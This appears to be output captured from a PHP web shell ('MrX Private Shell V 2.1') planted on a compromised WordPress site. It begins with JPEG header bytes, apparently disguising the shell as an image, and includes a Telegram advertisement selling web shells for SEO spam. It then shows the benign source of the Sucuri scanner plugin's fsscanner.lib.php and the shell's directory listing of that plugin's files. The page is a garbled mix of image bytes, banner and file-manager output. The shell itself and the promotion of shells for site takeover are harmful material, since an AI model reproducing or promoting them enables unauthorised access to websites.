����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Code related to the fsscanner.lib.php interface.
*
* PHP version 5
*
* @category Library
* @package Sucuri
* @subpackage SucuriScanner
* @author Daniel Cid <dcid@sucuri.net>
* @copyright 2010-2018 Sucuri Inc.
* @license https://www.gnu.org/licenses/gpl-2.0.txt GPL2
* @link https://wordpress.org/plugins/sucuri-scanner
*/
if (!defined('SUCURISCAN_INIT') || SUCURISCAN_INIT !== true) {
if (!headers_sent()) {
/* Report invalid access if possible. */
header('HTTP/1.1 403 Forbidden');
}
exit(1);
}
/**
* File System Scanner
*
* The File System Scanner component performs full and incremental scans over a
* file system folder, maintaining a snapshot of the filesystem and comparing it
* with the current content to establish what content has been updated. Updated
* content is then submitted to the remote server and it is stored for future
* analysis.
*
* @category Library
* @package Sucuri
* @subpackage SucuriScanner
* @author Daniel Cid <dcid@sucuri.net>
* @copyright 2010-2018 Sucuri Inc.
* @license https://www.gnu.org/licenses/gpl-2.0.txt GPL2
* @link https://wordpress.org/plugins/sucuri-scanner
*/
class SucuriScanFSScanner extends SucuriScan
{
/**
* Retrieve the last time when the filesystem scan was ran.
*
* @param bool $format Whether the timestamp must be formatted as date/time or not.
* @return string The timestamp of the runtime, or an string with the date/time.
*/
public static function getFilesystemRuntime($format = false)
{
$runtime = SucuriScanOption::getOption(':runtime');
if ($runtime > 0) {
if ($format) {
return SucuriScan::datetime($runtime);
}
return $runtime;
}
return 'Unknown';
}
/**
* Add a new directory path to the list of ignored paths.
*
* @param string $path The (full) absolute path of a directory.
* @return bool TRUE if the directory path was added to the list, FALSE otherwise.
*/
public static function ignoreDirectory($path = '')
{
$cache = new SucuriScanCache('ignorescanning');
$resource_type = SucuriScanFileInfo::getResourceType($path);
$cache_value = array(
'directory_path' => $path,
'ignored_at' => time(),
'resource_type' => $resource_type,
);
return $cache->add(md5($path), $cache_value);
}
/**
* Remove a directory path from the list of ignored paths.
*
* @param string $path The (full) absolute path of a directory.
* @return bool TRUE if the directory path was removed to the list, FALSE otherwise.
*/
public static function unignoreDirectory($path = '')
{
$cache = new SucuriScanCache('ignorescanning');
return $cache->delete(md5($path));
}
/**
* Returns a list of ignored directories.
*
* <ul>
* <li><b>raw:</b> Contains the raw data from the local cache.</li>
* <li><b>checksums:</b> Contains the md5 of all the directories.</li>
* <li><b>directories:</b> Contains a list of directories.</li>
* <li><b>ignored_at_list:</b> Contains a list of timestamps.</li>
* </ul>
*
* @return array List of ignored directories.
*/
public static function getIgnoredDirectories()
{
$response = array(
'raw' => array(),
'checksums' => array(),
'directories' => array(),
'ignored_at_list' => array(),
);
$cache = new SucuriScanCache('ignorescanning');
$cache_lifetime = 0; // It is not necessary to expire this cache.
$entries = $cache->getAll($cache_lifetime, 'array');
if ($entries) {
$response['raw'] = $entries;
foreach ($entries as $checksum => $data) {
if (isset($data['directory_path']) && isset($data['ignored_at'])) {
$response['checksums'][] = $checksum;
$response['directories'][] = $data['directory_path'];
$response['ignored_at_list'][] = $data['ignored_at'];
}
}
}
return $response;
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| api.lib.php | File | 37.23 KB | 0644 |
|
| auditlogs.lib.php | File | 10.89 KB | 0644 |
|
| base.lib.php | File | 27.75 KB | 0644 |
|
| cache.lib.php | File | 16.15 KB | 0644 |
|
| cli.lib.php | File | 4.8 KB | 0644 |
|
| command.lib.php | File | 6.19 KB | 0644 |
|
| cron.lib.php | File | 1.8 KB | 0644 |
|
| event.lib.php | File | 32.55 KB | 0644 |
|
| fileinfo.lib.php | File | 14.98 KB | 0644 |
|
| firewall.lib.php | File | 25.74 KB | 0644 |
|
| fsscanner.lib.php | File | 4.2 KB | 0644 |
|
| globals.php | File | 8.46 KB | 0644 |
|
| hardening.lib.php | File | 10.94 KB | 0644 |
|
| hook.lib.php | File | 38.23 KB | 0644 |
|
| index.html | File | 38 B | 0644 |
|
| installer-skin-legacy.lib.php | File | 1.58 KB | 0644 |
|
| installer-skin.lib.php | File | 2.35 KB | 0644 |
|
| integrity.lib.php | File | 26.07 KB | 0644 |
|
| interface.lib.php | File | 13.03 KB | 0644 |
|
| lastlogins-failed.php | File | 14.32 KB | 0644 |
|
| lastlogins-loggedin.php | File | 7.76 KB | 0644 |
|
| lastlogins.php | File | 16.13 KB | 0644 |
|
| mail.lib.php | File | 9.48 KB | 0644 |
|
| option.lib.php | File | 23.25 KB | 0644 |
|
| pagehandler.php | File | 8.97 KB | 0644 |
|
| request.lib.php | File | 4.4 KB | 0644 |
|
| settings-alerts.php | File | 26.7 KB | 0644 |
|
| settings-apiservice.php | File | 5.53 KB | 0644 |
|
| settings-general.php | File | 27.19 KB | 0644 |
|
| settings-hardening.php | File | 32.42 KB | 0644 |
|
| settings-integrity.php | File | 5.37 KB | 0644 |
|
| settings-posthack.php | File | 21.51 KB | 0644 |
|
| settings-scanner.php | File | 9.69 KB | 0644 |
|
| settings-webinfo.php | File | 5.55 KB | 0644 |
|
| settings.php | File | 947 B | 0644 |
|
| sitecheck.lib.php | File | 19.21 KB | 0644 |
|
| strings.php | File | 45.61 KB | 0644 |
|
| template.lib.php | File | 17.88 KB | 0644 |
|
| wordpress-recommendations.lib.php | File | 10.9 KB | 0644 |
|